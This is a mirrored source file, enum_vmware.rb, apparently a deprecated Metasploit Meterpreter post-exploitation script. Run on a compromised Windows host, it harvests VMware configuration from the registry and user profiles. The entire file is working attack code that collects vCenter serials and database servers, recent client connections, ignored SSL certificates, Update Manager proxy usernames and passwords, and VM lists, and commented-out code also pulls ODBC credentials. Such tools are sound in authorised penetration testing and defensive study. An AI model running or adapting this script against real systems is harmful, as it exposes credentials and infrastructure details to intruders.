Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

enum_vmware.rb 13KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. # Author: Carlos Perez at carlos_perez[at]darkoperator.com
  7. #-------------------------------------------------------------------------------
  8. ################## Variable Declarations ##################
  9. @client = client
  10. opts = Rex::Parser::Arguments.new(
  11. "-h" => [ false,"Help menu." ]
  12. )
  13. opts.parse(args) { |opt, idx, val|
  14. case opt
  15. when "-h"
  16. print_line("vmware_enum -- Enumerates VMware Configurations for VMware Products")
  17. print_line("USAGE: run vmware_enum")
  18. print_line(opts.usage)
  19. raise Rex::Script::Completed
  20. end
  21. }
  22. def check_prods()
  23. key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\VMware, Inc.', KEY_READ)
  24. sfmsvals = key.enum_key
  25. print_status("The Following Products are installed on this host:")
  26. sfmsvals.each do |p|
  27. print_status("\t#{p}")
  28. end
  29. return sfmsvals
  30. end
  31. def check_vmsoft
  32. installed = false
  33. key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE', KEY_READ)
  34. sfmsvals = key.enum_key
  35. if sfmsvals.include?("VMware, Inc.")
  36. print_status("VMware Products are Installed in Host")
  37. installed = true
  38. else
  39. print_error("No VMware Products where found in this Host.")
  40. end
  41. key.close
  42. return installed
  43. end
  44. def enum_vcenter
  45. print_status("Information about Virtual Center:")
  46. vc_dbuser = nil
  47. vc_dbencpass = nil
  48. vc_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","InstalledVersion")
  49. vc_serial = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","Serial")
  50. vc_dbinstance = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","DBInstanceName")
  51. vc_dbtype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","DBServerType")
  52. vc_tomcatver = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\Tomcat","Version")
  53. vc_type = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","GroupType")
  54. vc_odbcname = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","1")
  55. vc_odbctype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","4")
  56. # vc_odctrustcon = reg_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname}","TrustedConnection")
  57. # print_line("*")
  58. # if vc_odctrustcon.to_i != 1
  59. # vc_dbuser = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","2")
  60. # print_line("*")
  61. # vc_dbencpass = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","3")
  62. # print_line("*")
  63. # end
  64. vc_dbname = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname.chomp}","Database")
  65. vc_dbserver = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname.chomp}","Server")
  66. print_status("\tVersion: #{vc_version}")
  67. print_status("\tSerial: #{vc_serial}")
  68. print_status("\tvCenter Type: #{vc_type}")
  69. print_status("\tTomcat Version: #{vc_tomcatver}")
  70. print_status("\tDatabase Instance: #{vc_dbinstance}")
  71. print_status("\tDatabase Type: #{vc_dbtype}")
  72. print_status("\tDatabase Name: #{vc_dbname}")
  73. print_status("\tDatabase Server: #{vc_dbserver}")
  74. print_status("\tODBC Name: #{vc_odbcname}")
  75. print_status("\tODBC Type: #{vc_odbctype}")
  76. # if vc_odctrustcon.to_i != 1
  77. # print_status("\tODBC Username: #{vc_dbuser}")
  78. # print_status("\tODBC Password: #{vc_dbencpass}")
  79. # end
  80. end
  81. def enum_viclient
  82. print_status("Information about VMware VI Client:")
  83. vi_pluggins = nil
  84. begin
  85. vi_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\4.0","InstalledVersion")
  86. vi_pluggins = registry_enumvals("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\Plugins")
  87. rescue
  88. end
  89. print_status("\tVersion: #{vi_version}")
  90. if vi_pluggins
  91. vi_pluggins.each do |pi|
  92. if pi=~ /Converter/
  93. print_status("\tPlugin: VMware Converter")
  94. elsif pi =~/UM/
  95. print_status("\tPlugin: VMware Update Manager")
  96. else
  97. print_status("\tPlugin: #{pi}")
  98. end
  99. end
  100. end
  101. if not is_system?
  102. recentconns = registry_getvaldata("HKCU\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
  103. print_status("Recent VI Client Connections:")
  104. recentconns.each do |c|
  105. print_status("\t#{c}")
  106. end
  107. ignore_ssl = registry_enumkeys("HKCU\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore")
  108. if ignore_ssl.length > 0
  109. print_status("\tIgnored SSL Certs for")
  110. ignore_ssl.each do |issl|
  111. ssl_key = registry_getvaldata("HKCU\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore",issl)
  112. print_status("\tHost: #{issl} SSL Fingerprint: #{ssl_key}")
  113. end
  114. end
  115. else
  116. user_sid = []
  117. key = "HKU\\"
  118. root_key, base_key = @client.sys.registry.splitkey(key)
  119. open_key = @client.sys.registry.open_key(root_key, base_key)
  120. keys = open_key.enum_key
  121. keys.each do |k|
  122. user_sid << k if k =~ /S-1-5-21-\d*-\d*-\d*-\d{3,6}$/
  123. end
  124. user_sid.each do |us|
  125. begin
  126. enumed_user = registry_getvaldata("HKU\\#{us}\\Volatile Environment","USERNAME")
  127. print_status("\tRecent VI Client Connections for #{enumed_user}:")
  128. recentconns = registry_getvaldata("HKU\\#{us}\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
  129. recentconns.each do |c|
  130. print_status("\t#{c}")
  131. end
  132. ignore_ssl = registry_enumkeys("HKU\\#{us}\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore")
  133. if ignore_ssl.length > 0
  134. print_status("\tIgnored SSL Certs for #{enumed_user}:")
  135. ignore_ssl.each do |issl|
  136. ssl_key = registry_getvaldata("HCU\\#{us}\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore",issl)
  137. print_status("\tHost: #{issl} SSL Fingerprint: #{ssl_key}")
  138. end
  139. end
  140. rescue
  141. print_status("\tUser appears to have not used the software.")
  142. end
  143. end
  144. end
  145. end
  146. def enum_vum
  147. print_status("Information about VMware Update Manager:")
  148. begin
  149. vum_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","InstalledVersion")
  150. vum_server = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VUMServer")
  151. vum_dbtype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","DBServerType")
  152. vum_direct2web = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","DirectWebAccess")
  153. vum_useproxy = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","UseProxy")
  154. vum_proxyserver = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyServer")
  155. vum_proxyport = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyPort")
  156. vum_proxyuser = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyUserName")
  157. vum_proxypass = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyPassword")
  158. vum_vcentersrv = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VCServer")
  159. vum_vcenterusr = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VCUserName")
  160. vum_patchstore = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","PatchStore")
  161. vum_odbcname = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","1")
  162. vum_odbctype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","4")
  163. vum_dbname = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","Database")
  164. vum_dbserver = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","Server")
  165. # vum_trustedcon = reg_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","TrustedConnection")
  166. # if vum_trustedcon.to_i != 1
  167. # vum_odbcusename = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","2")
  168. # vum_odbcpass = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","3")
  169. # end
  170. print_status("\tVersion: #{vum_version}")
  171. print_status("\tServer: #{vum_server}")
  172. print_status("\tPatch Store: #{vum_patchstore}")
  173. print_status("\tDatabse Type: #{vum_dbtype}")
  174. print_status("\tUses Proxy: #{vum_useproxy}")
  175. print_status("\tProxy User: #{vum_proxyuser}")
  176. print_status("\tProxy Password: #{vum_proxypass}")
  177. print_status("\tVirtual Center: #{vum_vcentersrv}")
  178. print_status("\tVirtual Center User: #{vum_vcenterusr}")
  179. print_status("\tProxy Server: #{vum_proxyserver}:#{vum_proxyport}")
  180. print_status("\tDatabase Name: #{vum_dbname}")
  181. print_status("\tDatabase Server: #{vum_dbserver}")
  182. print_status("\tODBC Name: #{vum_odbcname}")
  183. print_status("\tODBC Type: #{vum_odbctype}")
  184. # print_status("\t ODBC Trusted: #{vum_trustedcon}")
  185. # if vum_trustedcon.to_i != 1
  186. # print_status("\tODBC Username: #{vum_odbcusename}")
  187. # print_status("\tODBC Password: #{vum_odbcpass}")
  188. # end
  189. rescue ::Exception => e
  190. print_status("Error: #{e.class} #{e}")
  191. end
  192. end
  193. def enum_vdm
  194. print_status("Information about VMware VDM Broker:")
  195. vdm_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VDM","ProductVersion")
  196. print_status("\tVersion: #{vdm_version}")
  197. end
  198. def enum_powercli
  199. print_status("Information about PowerCLI:")
  200. pcli_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI","InstalledVersion")
  201. pcli_install_path = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI","InstallPath")
  202. begin
  203. pcli_poweshell_policy = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\WindowsPowerShell","ExecutionPolicy")
  204. rescue
  205. pcli_poweshell_policy = "Restricted"
  206. end
  207. print_status("\tVersion: #{pcli_version}")
  208. print_status("\tInstalled Pat: #{pcli_install_path}")
  209. print_status("\tPowershell Execution Policy: #{pcli_poweshell_policy}")
  210. end
  211. #Function to enumerate the users if running as SYSTEM
  212. def enum_users
  213. os = @client.sys.config.sysinfo['OS']
  214. users = []
  215. path4users = ""
  216. sysdrv = @client.sys.config.getenv('SystemDrive')
  217. if os =~ /7|Vista|2008/
  218. path4users = sysdrv + "\\users\\"
  219. profilepath = "\\AppData\\Local\\VMware\\"
  220. else
  221. path4users = sysdrv + "\\Documents and Settings\\"
  222. profilepath = "\\Application Data\\VMware\\"
  223. end
  224. if @client.sys.config.is_system?
  225. print_status("Running as SYSTEM extracting user list..")
  226. @client.fs.dir.foreach(path4users) do |u|
  227. userinfo = {}
  228. next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
  229. userinfo['username'] = u
  230. userinfo['userappdata'] = path4users + u + profilepath
  231. users << userinfo
  232. end
  233. else
  234. userinfo = {}
  235. uservar = @client.sys.config.getenv('USERNAME')
  236. userinfo['username'] = uservar
  237. userinfo['userappdata'] = path4users + uservar + profilepath
  238. users << userinfo
  239. end
  240. return users
  241. end
  242. def enum_vihosupdt
  243. hosts = []
  244. print_status("Information about VMware vSphere Host Update Utility:")
  245. enum_users.each do |u|
  246. print_status("\tESX/ESXi Hosts added for Updates for user #{u['username']}:")
  247. begin
  248. @client.fs.dir.foreach(u['userappdata']+"VIU\\hosts\\") do |vmdir|
  249. next if vmdir =~ /^(\.|\.\.)$/
  250. print_status("\t#{vmdir}")
  251. end
  252. rescue
  253. end
  254. end
  255. end
  256. def enum_vmwarewrk
  257. config = ""
  258. name = ""
  259. print_status("Enumerating VMware Workstation VM's:")
  260. fav_file = ""
  261. enum_users.each do |u|
  262. print_status("\tVM's for user #{u['username']}:")
  263. path = u['userappdata'].gsub(/Local/,"Roaming")
  264. account_file = @client.fs.file.new(path + "\\favorites.vmls", "rb")
  265. until account_file.eof?
  266. fav_file << account_file.read
  267. end
  268. end
  269. fav_file.each_line do |l|
  270. if l =~ /config/
  271. print_status("\tConfiguration File: #{l.scan(/vmlist\d*.config \= (\".*\")/)}")
  272. end
  273. if l =~ /Name/
  274. print_status("\tVM Name: #{l.scan(/vmlist\d*.DisplayName \= (\".*\")/)}")
  275. print_status("")
  276. end
  277. end
  278. end
  279. if client.platform == 'windows'
  280. if check_vmsoft
  281. vmware_products = check_prods()
  282. if vmware_products.include?("VMware VirtualCenter")
  283. enum_vcenter
  284. end
  285. if vmware_products.include?("VMware Virtual Infrastructure Client")
  286. enum_viclient
  287. end
  288. if vmware_products.include?("VMware Update Manager")
  289. enum_vum
  290. end
  291. if vmware_products.include?("VMware VDM")
  292. enum_vdm
  293. end
  294. if vmware_products.include?("VMware vSphere PowerCLI")
  295. enum_powercli
  296. end
  297. if vmware_products.include?("VMware vSphere Host Update Utility 4.0")
  298. enum_vihosupdt
  299. end
  300. if vmware_products.include?("VMware Workstation")
  301. enum_vmwarewrk
  302. end
  303. else
  304. print_status("No VMware Products appear to be installed in this host")
  305. end
  306. else
  307. print_error("This version of Meterpreter is not supported with this Script!")
  308. raise Rex::Script::Completed
  309. end